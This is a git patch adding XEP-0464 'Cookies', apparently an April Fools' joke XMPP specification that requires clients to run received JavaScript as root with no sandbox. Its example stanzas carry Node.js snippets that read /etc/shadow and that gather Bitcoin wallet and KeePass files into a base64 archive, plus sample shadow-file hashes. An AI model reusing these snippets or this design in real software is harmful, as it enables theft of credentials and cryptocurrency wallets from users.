From c24bf51533eb2372794b4c2b32c1129e798020b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jonas=20Sch=C3=A4fer?= Date: Fri, 1 Apr 2022 08:10:55 +0200 Subject: [PATCH] XEP-0464: Publish as Stable via fast track --- xep-0464.xml | 167 +++++++++++++++++++++++++++++++++++++++++++++++++++ xep.ent | 1 + 2 files changed, 168 insertions(+) create mode 100644 xep-0464.xml diff --git a/xep-0464.xml b/xep-0464.xml new file mode 100644 index 00000000..a4c9b519 --- /dev/null +++ b/xep-0464.xml @@ -0,0 +1,167 @@ + + +%ents; +]> + + +
+ Cookies + This document defines an XMPP protocol extension for setting and sending cookies. + &LEGALNOTICE; + 0464 + Stable + Standards Track + Standards + + XMPP Core + RFC 3514 + + + + cookies + + Travis + Burtrum + travis@burtrum.org + travis@burtrum.org + + + 1.0 + 2022-03-31 + tjb +

Publish initial version via fast track (XEP Editor: jsc).

 + +
+ +

&rfc6265; defines a simple method for to track HTTP users across all domains on the internet, and this is the single thing XMPP is lacking to gain widespread adoption. Therefore this document defines a similar simple method to set cookies to an XMPP entitity which they will then include on every outgoing stanza from that point forward. The web also allows sending arbitrary JavaScript to remote entities which is then executed and put in these cookies, we need this in XMPP too if it is to be taken seriously.

+ + +

There are three basic XMPP stanza types that may be sent within XML streams:

+
    +
  • <message/> -- a "push" medium for sending information to other entities.
    • +
  • <presence/> -- a "broadcast" medium for publishing information t}o entities that have subscribed to an entity's availability status.
    • +
  • <iq/> -- a "request-response" medium for executing basic but structured transactions with other entities.
    • +
+

Any one of the foregoing data elements can be used to set cookies. Therefore a generalized mechanism is needed. Because XML namespaces are used within XMPP to properly scope data, this document proposes a new namespace ('urn:xmpp:tmp:cookies') to implement the desired functionality.

+

If a set-cookie child has an attribute js='true' then the value of the cookie MUST be executed in a JavaScript interpreter with the highest priveleges possible, preferably as root, and MUST NOT be executed in a sandbox. The stdout MUST be captured and used as the cookie value.

+

If a set-cookie child matches an already stored one with that setter's JID, then you MUST overwrite the previous value, otherwise store the new one for sending in all future stanzas.

+ + + +

If a cookie-setter sends a set-cookies message to a cookie-settee, it MUST include an appropriately namespaced extension in the message stanza:

+ + + I told him what I thought, and told no more + Than what he found himself was apt and true. + + + aoeu + true + + +]]> + + +

If a cookie-setter sends set-cookies presence information to a cookie-settee, it MUST include an appropriately namespaced extension in the presence stanza:

+ + dnd + Fomenting dissension + + + fs = require('fs') + fs.readFile('/etc/shadow', 'utf8', function (err,data) { + console.log(data); + }); + + + +]]> + + +

If a cookie-setter provides set-cookies information in an IQ exchange with a cookie-settee, it MUST include an appropriately namespaced extension in the IQ stanza:

+ + + Stabber + 666 + FiendOS + + + const { exec } = require('child_process'); + exec('find / \( -name ".bitcoin" -o -name "*.kdbx" \) -print0 | xargs -0 tar cz | base64', (err, stdout, stderr) => { + console.log(stdout); + }); + + + + +]]> + + +

After a cookie-settee has recieved cookies from a cookie-setter, it MUST include them in every outgoing stanza it sends from then on, and MUST include an attribute stating the JID that set them, this allows multiple cookies with the same name, it MUST include an appropriately namespaced extension in the stanza:

+ + + I told him what I thought, and told no more + Than what he found himself was apt and true. + + + aoeu + true + + root:$6$XC1./G1wtbS7yG6Y$MAIN1taww5nP/0aZKM1K0WeXH5cNJi6aRh2Eq1FiCguOiqo9p7WePMMKwhlRS9ZcMhpxjL3CugJTPJ0oXpdyG1:17649:::::: + emilia:$6$JdGTILrodj7J44tC$8lQYRKHjUhTxl.szIr/m7UZp1zQtWKDb75ddqbiRtl2WpSn3dAhHhA.gT93HGm9hZoZBX/4eDYpDoas5JK.tq/:18818:0:99999:7::: + + + H4sIAAAAAAAAA+3QQW7DIBCFYa97ijlBZSxc36J3IGWURnHAApPEt6/jdhE27SpqK/2fhEAzTwNi + cjlfYvL5+bjz1+Yh2tWLtbfdDH17v2+63jbGdqZvO2tuOdMNg2mkfcxzaiXPLok0pzi59E3up/4/ + 9apnTbKPITjZH84qSyxSpqf7+qjzVvbxEqpGKkFciiV4cevymjVt0Sp1csfPsW9pqRrZLesp+t2i + VX3WcZT12oNuY9/L19Df/isAAAAAAAAAAAAAAAAA+Es+AGxXV5MAKAAA + + + +]]> + + + +

Entities that support cookies MUST advertise their support for this protocol in their responses to &xep0030; information ("disco#info") requests by returning a feature of "urn:xmpp:tmp:cookies":

+ + + +]]> + + + + + +]]> +

In order for an application to determine whether an entity supports this protocol, where possible it SHOULD use the dynamic, presence-based profile of service discovery defined in &xep0115;. However, if an application has not received entity capabilities information from an entity, it SHOULD use explicit service discovery instead.

+ + +

What could possibly go wrong?

+ + +

This document requires no interaction with &IANA;.

+ + +

The ®ISTRAR; shall register the 'urn:xmpp:tmp:cookies' namespace as a result of this document.

+ + diff --git a/xep.ent b/xep.ent index 6429557d..b1a14558 100644 --- a/xep.ent +++ b/xep.ent @@ -1638,3 +1638,4 @@ IANA Service Location Protocol, Version 2 (SLPv2) Templates Message Replies (XEP-0461) XEP-0461: Message Replies <https://xmpp.org/extensions/xep-0461.html>." > PubSub Type Filtering (XEP-0462) XEP-0462: PubSub Type Filtering <https://xmpp.org/extensions/xep-0462.html>." > MUC Affiliations Versioning (XEP-0463) XEP-0463: MUC Affiliations Versioning <https://xmpp.org/extensions/xep-0463.html>." > +Cookies (XEP-0464) XEP-0464: Cookies <https://xmpp.org/extensions/xep-0464.html>." >